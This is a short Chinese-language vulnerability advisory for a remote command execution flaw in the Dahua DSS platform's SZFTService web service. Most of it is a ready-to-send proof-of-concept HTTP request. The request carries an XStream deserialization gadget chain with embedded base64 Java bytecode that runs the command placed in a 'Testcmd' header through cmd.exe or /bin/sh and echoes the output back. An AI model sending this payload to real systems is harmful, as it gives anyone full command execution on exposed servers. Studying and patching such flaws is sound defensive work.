漏洞描述
大华DSS SZFTService 存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令获取服务器权限。
大华DSS综合管理平台 SZFTService 存在远程命令执行漏洞
PoC代码
POST /itc/ws/SZFTService HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Testcmd: echo f1ebad623f
Content-Type: text/xml;charset=UTF-8
Content-Length: 7715
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.dhsoft.com">
<soapenv:Header/>
<soapenv:Body>
<web:synchroDeletePQ>
<!--type: string-->
<arg0><![CDATA[<linked-hash-set>
<dynamic-proxy>
<interface>map</interface>
<handler class='com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl'>
<classToInvocationHandler class='linked-hash-map'/>
<defaultHandler class='sun.tracing.NullProvider'>
<active>true</active>
<providerType>java.lang.Object</providerType>
<probes>
<entry>
<method>
<class>java.lang.Object</class>
<name>hashCode</name>
<parameter-types/>
</method>
<sun.tracing.dtrace.DTraceProbe>
<proxy class='com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' serialization='custom'>
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
<default>
<__name>Pwnr</__name>
<__bytecodes>
<byte-array>yv66vgAAADIA6QEADEZvb3Y0aEEydnVTUwcAAQEAEGphdmEvbGFuZy9PYmplY3QHAAMBAApTb3VyY2VGaWxlAQARRm9vdjRoQTJ2dVNTLmphdmEBAAl3cml0ZUJvZHkBABcoTGphdmEvbGFuZy9PYmplY3Q7W0IpVgEAJG9yZy5hcGFjaGUudG9tY2F0LnV0aWwuYnVmLkJ5dGVDaHVuawgACQEAD2phdmEvbGFuZy9DbGFzcwcACwEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7DAANAA4KAAwADwEAC25ld0luc3RhbmNlAQAUKClMamF2YS9sYW5nL09iamVjdDsMABEAEgoADAATAQAIc2V0Qnl0ZXMIABUBAAJbQgcAFwEAEWphdmEvbGFuZy9JbnRlZ2VyBwAZAQAEVFlQRQEAEUxqYXZhL2xhbmcvQ2xhc3M7DAAbABwJABoAHQEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwwAHwAgCgAMACEBAAY8aW5pdD4BAAQoSSlWDAAjACQKABoAJQEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAcAJwEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwAKQAqCgAoACsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsMAC0ALgoABAAvAQAHZG9Xcml0ZQgAMQEACWdldE1ldGhvZAwAMwAgCgAMADQBAB9qYXZhL2xhbmcvTm9TdWNoTWV0aG9kRXhjZXB0aW9uBwA2AQATamF2YS5uaW8uQnl0ZUJ1ZmZlcggAOAEABHdyYXAIADoBAARDb2RlAQAKRXhjZXB0aW9ucwEAE2phdmEvbGFuZy9FeGNlcHRpb24HAD4BAA1TdGFja01hcFRhYmxlAQAFZ2V0RlYBADgoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvT2JqZWN0OwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsMAEMARAoADABFAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uBwBHAQANZ2V0U3VwZXJjbGFzcwwASQAuCgAMAEoBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYMACMATAoASABNAQAiamF2YS9sYW5nL3JlZmxlY3QvQWNjZXNzaWJsZU9iamVjdAcATwEADXNldEFjY2Vzc2libGUBAAQoWilWDABRAFIKAFAAUwEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkBwBVAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMAFcAWAoAVgBZAQAQamF2YS9sYW5nL1N0cmluZwcAWwEAAygpVgwAIwBdCgAEAF4BABBqYXZhL2xhbmcvVGhyZWFkBwBgAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7DABiAGMKAGEAZAEADmdldFRocmVhZEdyb3VwAQAZKClMamF2YS9sYW5nL1RocmVhZEdyb3VwOwwAZgBnCgBhAGgBAAd0aHJlYWRzCABqDABBAEIKAAIAbAEAE1tMamF2YS9sYW5nL1RocmVhZDsHAG4BAAdnZXROYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsMAHAAcQoAYQByAQAEZXhlYwgAdAEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaDAB2AHcKAFwAeAEABGh0dHAIAHoBAAZ0YXJnZXQIAHwBABJqYXZhL2xhbmcvUnVubmFibGUHAH4BAAZ0aGlzJDAIAIABAAdoYW5kbGVyCACCAQAGZ2xvYmFsCACEAQAKcHJvY2Vzc29ycwgAhgEADmphdmEvdXRpbC9MaXN0BwCIAQAEc2l6ZQEAAygpSQwAigCLCwCJAIwBABUoSSlMamF2YS9sYW5nL09iamVjdDsMAFcAjgsAiQCPAQADcmVxCACRAQALZ2V0UmVzcG9uc2UIAJMBAAlnZXRIZWFkZXIIAJUBAAhUZXN0ZWNobwgAlwEAB2lzRW1wdHkBAAMoKVoMAJkAmgoAXACbAQAJc2V0U3RhdHVzCACdAQAJYWRkSGVhZGVyCACfAQAHVGVzdGNtZAgAoQEAB29zLm5hbWUIAKMBABBqYXZhL2xhbmcvU3lzdGVtBwClAQALZ2V0UHJvcGVydHkBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwwApwCoCgCmAKkBAAt0b0xvd2VyQ2FzZQwAqwBxCgBcAKwBAAZ3aW5kb3cIAK4BAAdjbWQuZXhlCACwAQACL2MIALIBAAcvYmluL3NoCAC0AQACLWMIALYBABFqYXZhL3V0aWwvU2Nhbm5lcgcAuAEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgcAugEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYMACMAvAoAuwC9AQAFc3RhcnQBABUoKUxqYXZhL2xhbmcvUHJvY2VzczsMAL8AwAoAuwDBAQARamF2YS9sYW5nL1Byb2Nlc3MHAMMBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07DADFAMYKAMQAxwEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgwAIwDJCgC5AMoBAAJcQQgAzAEADHVzZURlbGltaXRlcgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvdXRpbC9TY2FubmVyOwwAzgDPCgC5ANABAARuZXh0DADSAHEKALkA0wEACGdldEJ5dGVzAQAEKClbQgwA1QDWCgBcANcMAAcACAoAAgDZAQANZ2V0UHJvcGVydGllcwEAGCgpTGphdmEvdXRpbC9Qcm9wZXJ0aWVzOwwA2wDcCgCmAN0BABNqYXZhL3V0aWwvSGFzaHRhYmxlBwDfAQAIdG9TdHJpbmcMAOEAcQoA4ADiAQATW0xqYXZhL2xhbmcvU3RyaW5nOwcA5AEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHAOYKAOcAXgAhAAIA5wAAAAAAAwAKAAcACAACADwAAADcAAgABQAAALESCrgAEE4ttgAUTS0SFga9AAxZAxIYU1kEsgAeU1kFsgAeU7YAIiwGvQAEWQMrU1kEuwAaWQO3ACZTWQW7ABpZK763ACZTtgAsVyq2ADASMgS9AAxZAy1TtgA1KgS9AARZAyxTtgAsV6cASDoEEjm4ABBOLRI7BL0ADFkDEhhTtgAiLQS9AARZAytTtgAsTSq2ADASMgS9AAxZAy1TtgA1KgS9AARZAyxTtgAsV6cAA7EAAQAAAGgAawA3AAEAQAAAABEAAvcAawcAN/0ARAcABAcADAA9AAAABAABAD8ACgBBAEIAAgA8AAAAfgADAAUAAAA/AU0qtgAwTqcAGS0rtgBGTacAFqcAADoELbYAS06nAAMtEgSm/+csAaYADLsASFkrtwBOvywEtgBULCq2AFqwAAEACgATABYASAABAEAAAAAlAAb9AAoHAFYHAAwI/wACAAQHAAQHAFwHAFYHAAwAAQcASAkFDQA9AAAABAABAD8AAQAjAF0AAgA8AAADNgAIAA0AAAI/KrcA6AM2BLgAZbYAaRJruABtwABvOgUDNgYVBhkFvqICHxkFFQYyOgcZBwGmAAanAgkZB7YAc04tEnW2AHmaAAwtEnu2AHmaAAanAe4ZBxJ9uABtTCvBAH+aAAanAdwrEoG4AG0Sg7gAbRKFuABtTKcACzoIpwHDpwAAKxKHuABtwACJOgkDNgoVChkJuQCNAQCiAZ4ZCRUKuQCQAgA6CxkLEpK4AG1MK7YAMBKUA70ADLYANSsDvQAEtgAsTSu2ADASlgS9AAxZAxJcU7YANSsEvQAEWQMSmFO2ACzAAFxOLQGlAAottgCcmQAGpwBYLLYAMBKeBL0ADFkDsgAeU7YANSwEvQAEWQO7ABpZEQDItwAmU7YALFcstgAwEqAFvQAMWQMSXFNZBBJcU7YANSwFvQAEWQMSmFNZBC1TtgAsVwQ2BCu2ADASlgS9AAxZAxJcU7YANSsEvQAEWQMSolO2ACzAAFxOLQGlAAottgCcmQAGpwCNLLYAMBKeBL0ADFkDsgAeU7YANSwEvQAEWQO7ABpZEQDItwAmU7YALFcSpLgAqrYArRKvtgB5mQAYBr0AXFkDErFTWQQSs1NZBS1TpwAVBr0AXFkDErVTWQQSt1NZBS1TOgwsuwC5WbsAu1kZDLcAvrYAwrYAyLcAyxLNtgDRtgDUtgDYuADaBDYELQGlAAottgCcmQAIFQSaAAanABAsuADetgDjtgDYuADaFQSZAAanAAmECgGn/lwVBJkABqcACYQGAaf937EAAQBfAHAAcwA/AAEAQAAAAN0AGf8AGgAHBwACAAAAAQcAbwEAAPwAFwcAYf8AFwAIBwACAAAHAFwBBwBvAQcAYQAAAv8AEQAIBwACBwAEAAcAXAEHAG8BBwBhAABTBwA/BP8AAgAIBwACBwAEAAcAXAEHAG8BBwBhAAD+AA0ABwCJAf8AYwAMBwACBwAEBwAEBwBcAQcAbwEHAGEABwCJAQcABAAAAvsAVC4C+wBNUQcA5SkLBAIMB/8ABQALBwACBwAEAAcAXAEHAG8BBwBhAAcAiQEAAP8ABwAIBwACAAAAAQcAbwEHAGEAAPoABQA9AAAABAABAD8AAQAFAAAAAgAG</byte-array>
<byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array>
</__bytecodes>
<__transletIndex>-1</__transletIndex>
<__indentNumber>0</__indentNumber>
</default>
<boolean>false</boolean> </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
</proxy>
<implementing__method>
<class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class>
<name>getOutputProperties</name>
<parameter-types/>
</implementing__method>
</sun.tracing.dtrace.DTraceProbe>
</entry>
</probes>
</defaultHandler>
</handler>
</dynamic-proxy>
</linked-hash-set>]]></arg0>
</web:synchroDeletePQ>
</soapenv:Body>
</soapenv:Envelope>